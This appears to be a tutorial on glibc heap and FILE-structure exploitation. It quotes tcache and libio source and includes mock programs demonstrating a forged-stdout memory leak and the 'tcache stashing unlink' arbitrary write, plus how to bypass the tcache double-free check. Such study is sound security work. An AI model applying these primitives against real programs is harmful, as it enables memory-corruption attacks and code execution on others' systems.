```c
/* We overlay this structure on the user-data portion of a chunk when
   the chunk is stored in the per-thread cache.  */
typedef struct tcache_entry
{
  struct tcache_entry *next;
} tcache_entry;
```
```c
/* There is one of these for each thread, which contains the
   per-thread cache (hence "tcache_perthread_struct").  Keeping
   overall size low is mildly important.  Note that COUNTS and ENTRIES
   are redundant (we could have just counted the linked list each
   time), this is for performance reasons.  */
typedef struct tcache_perthread_struct
{
  char counts[TCACHE_MAX_BINS];
  tcache_entry *entries[TCACHE_MAX_BINS];
} tcache_perthread_struct;
```
Starting with glibc 2.29, `tcache_entry` gained a second field used for double-free detection:

```c
typedef struct tcache_entry
{
  struct tcache_entry *next;
  /* This field exists to detect double frees.  */
  struct tcache_perthread_struct *key;
} tcache_entry;
```
`next` sits at the position of `fd` in `malloc_chunk`, and `key` sits at the position of `bk` (see the sketch below).
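To make the overlay concrete, here is a small standalone sketch. The struct definitions are trimmed copies for illustration, not the real glibc headers; it prints where `next` and `key` land relative to the user-data pointer returned by `chunk2mem`:

```c
#include <stdio.h>
#include <stddef.h>

/* Trimmed copy of the glibc 2.29-era tcache_entry shown above.  */
typedef struct tcache_entry
{
  struct tcache_entry *next;
  struct tcache_perthread_struct *key;
} tcache_entry;

/* Simplified malloc_chunk: fd/bk immediately follow the header, so
   they start exactly at the user-data pointer (chunk + 2 * SIZE_SZ). */
struct malloc_chunk
{
  size_t mchunk_prev_size;
  size_t mchunk_size;
  struct malloc_chunk *fd;
  struct malloc_chunk *bk;
};

int
main (void)
{
  size_t mem_off = 2 * sizeof (size_t);   /* chunk2mem skips the header */
  printf ("fd offset from mem: %zu, next offset: %zu\n",
          offsetof (struct malloc_chunk, fd) - mem_off,
          offsetof (tcache_entry, next));  /* both 0 */
  printf ("bk offset from mem: %zu, key offset: %zu\n",
          offsetof (struct malloc_chunk, bk) - mem_off,
          offsetof (tcache_entry, key));   /* both 8 on 64-bit */
  return 0;
}
```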
`tcache_put` was updated accordingly to maintain `key`:
```c
static __always_inline void
tcache_put (mchunkptr chunk, size_t tc_idx)
{
  tcache_entry *e = (tcache_entry *) chunk2mem (chunk);

  /* Mark this chunk as "in the tcache" so the test in _int_free will
     detect a double free.  */
  e->key = tcache;   /* tag the chunk with its owning tcache */

  e->next = tcache->entries[tc_idx];
  tcache->entries[tc_idx] = e;
  ++(tcache->counts[tc_idx]);
}
```
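For context, the consumer of `key` is the double-free check in `_int_free`. Roughly (trimmed from a glibc 2.29-era tree; treat it as a sketch rather than an exact quote):

```c
/* In _int_free, before the chunk is put back into the tcache.  */
size_t tc_idx = csize2tidx (size);
if (tcache != NULL && tc_idx < mp_.tcache_bins)
  {
    tcache_entry *e = (tcache_entry *) chunk2mem (p);

    /* This test succeeds on double free.  It can also match random
       payload data by coincidence, so the bin is walked to confirm
       before aborting.  */
    if (__glibc_unlikely (e->key == tcache))
      {
        tcache_entry *tmp;
        for (tmp = tcache->entries[tc_idx]; tmp; tmp = tmp->next)
          if (tmp == e)
            malloc_printerr ("free(): double free detected in tcache 2");
        /* If we get here, the match was a coincidence; the normal
           tcache_put path follows.  */
      }
  }
```

This is why a plain double free into the tcache aborts on glibc 2.29+: the second free finds `e->key` still equal to `tcache`. Overwriting `key` before the second free (for example through a use-after-free write) defeats this fast-path check.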
On the FILE side, `_IO_new_file_overflow` runs when output is written to a full buffer, or with `ch == EOF` to flush pending output:

```c
int
_IO_new_file_overflow (_IO_FILE *f, int ch)
{
  if (f->_flags & _IO_NO_WRITES)
    {
      f->_flags |= _IO_ERR_SEEN;
      __set_errno (EBADF);
      return EOF;
    }
  /* If currently reading or no buffer allocated. */
  if ((f->_flags & _IO_CURRENTLY_PUTTING) == 0 || f->_IO_write_base == NULL)
    {
      ......
    }
  if (ch == EOF)
    return _IO_do_write (f, f->_IO_write_base,
                         f->_IO_write_ptr - f->_IO_write_base);
```

With `ch == EOF`, everything between `_IO_write_base` and `_IO_write_ptr` is flushed via `_IO_do_write`, which resolves to `new_do_write`:
```c
static _IO_size_t
new_do_write (_IO_FILE *fp, const char *data, _IO_size_t to_do)
{
  _IO_size_t count;
  if (fp->_flags & _IO_IS_APPENDING)
    /* On a system without a proper O_APPEND implementation,
       you would need to sys_seek(0, SEEK_END) here, but is
       not needed nor desirable for Unix- or Posix-like systems.
       Instead, just indicate that offset (before and after) is
       unpredictable. */
    fp->_offset = _IO_pos_BAD;
  else if (fp->_IO_read_end != fp->_IO_write_base)
    {
      ............
    }
  count = _IO_SYSWRITE (fp, data, to_do);
```
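Taken together, these two functions give the classic stdout leak primitive: if an attacker can forge `_flags` and the write pointers of a `FILE`, the `ch == EOF` path hands `[_IO_write_base, _IO_write_ptr)` straight to `write(2)`. The following self-contained mock replays just the relevant checks; `struct mini_file` and `mock_overflow_eof` are hypothetical stand-ins, with only the flag constants taken from glibc's libio headers:

```c
#include <unistd.h>

/* Flag values as defined in glibc's libio headers.  */
#define IO_MAGIC             0xFBAD0000
#define IO_NO_WRITES         0x0008
#define IO_CURRENTLY_PUTTING 0x0800
#define IO_IS_APPENDING      0x1000

/* Hypothetical, heavily trimmed stand-in for _IO_FILE.  */
struct mini_file
{
  unsigned int flags;
  char *read_end;
  char *write_base;
  char *write_ptr;
  int fd;
};

/* Replays the checks of _IO_new_file_overflow / new_do_write for the
   ch == EOF flush path shown above.  */
static ssize_t
mock_overflow_eof (struct mini_file *f)
{
  if (f->flags & IO_NO_WRITES)
    return -1;                       /* would set _IO_ERR_SEEN and bail */
  if ((f->flags & IO_CURRENTLY_PUTTING) == 0 || f->write_base == NULL)
    return -1;                       /* would take the setup branch */
  if (!(f->flags & IO_IS_APPENDING) && f->read_end != f->write_base)
    return -1;                       /* would take the seek branch */
  /* _IO_SYSWRITE: whatever lies between write_base and write_ptr goes
     to the descriptor, no matter what it points at.  */
  return write (f->fd, f->write_base, f->write_ptr - f->write_base);
}

int
main (void)
{
  char secret[] = "leaked-bytes\n";
  struct mini_file f = {
    /* 0xfbad1800: magic | IS_APPENDING | CURRENTLY_PUTTING, the value
       commonly planted in stdout->_flags in exploits.  */
    .flags = IO_MAGIC | IO_IS_APPENDING | IO_CURRENTLY_PUTTING,
    .write_base = secret,                    /* start of the "leak" */
    .write_ptr = secret + sizeof secret - 1, /* end of the "leak"   */
    .fd = 1,
  };
  mock_overflow_eof (&f);   /* prints "leaked-bytes" */
  return 0;
}
```

In a real attack the same fields are overwritten inside libc's actual `stdout`, so the flush leaks whatever libc memory the forged pointers cover.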
Back on the heap side: when `_int_malloc` serves a request from a smallbin, it opportunistically stashes the remaining chunks of that size into the tcache:

```c
#if USE_TCACHE
      /* While we're here, if we see other chunks of the same size,
         stash them in the tcache.  */
      size_t tc_idx = csize2tidx (nb);
      if (tcache && tc_idx < mp_.tcache_bins)
        {
          mchunkptr tc_victim;

          /* While bin not empty and tcache not full, copy chunks over.  */
          while (tcache->counts[tc_idx] < mp_.tcache_count
                 && (tc_victim = last (bin)) != bin)
            {
              if (tc_victim != 0)
                {
                  bck = tc_victim->bk;
                  set_inuse_bit_at_offset (tc_victim, nb);
                  if (av != &main_arena)
                    set_non_main_arena (tc_victim);
                  bin->bk = bck;
                  bck->fd = bin;

                  tcache_put (tc_victim, tc_idx);
                }
            }
        }
```
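This loop is the basis of the "tcache stashing unlink" attack: the stashed chunks are never size- or link-checked, so if `tc_victim->bk` has been corrupted to point at a fake chunk, `bck->fd = bin` writes a libc bin address into attacker-chosen memory, and the fake chunk itself lands in the tcache. A standalone mock of just the pointer writes, using a hypothetical trimmed `struct chunk` rather than real heap chunks:

```c
#include <stdio.h>

/* Trimmed stand-in for malloc_chunk; only the list links matter here. */
struct chunk { struct chunk *fd, *bk; };

int
main (void)
{
  struct chunk bin = { 0 };     /* plays the smallbin header in libc     */
  struct chunk victim = { 0 };  /* last (bin): the chunk about to stash  */
  struct chunk fake = { 0 };    /* attacker-controlled fake chunk        */

  /* Sane starting state: circular list bin <-> victim.  */
  bin.bk = &victim;
  victim.fd = &bin;

  /* Corruption: victim->bk redirected to the fake chunk.  In the real
     malloc_chunk layout fd sits at chunk + 0x10 (64-bit), so the
     attacker sets victim->bk = target_address - 0x10 to land the fd
     write exactly on the target.  */
  victim.bk = &fake;

  /* What the stash loop body does for victim: */
  struct chunk *bck = victim.bk;   /* bck = tc_victim->bk  (== &fake)   */
  bin.bk = bck;                    /* bin->bk = bck                     */
  bck->fd = &bin;                  /* bck->fd = bin: writes a libc bin
                                      address through the fake chunk    */
  /* tcache_put (victim) runs next; on the following iteration
     last (bin) == &fake, so the fake chunk itself gets stashed.  */

  printf ("fake.fd = %p (&bin = %p)\n", (void *) fake.fd, (void *) &bin);
  return 0;
}
```

In practice the tcache count for the bin is groomed beforehand so the loop runs exactly the needed number of iterations, and the fake chunk's `bk` must point to writable memory to survive the next pass.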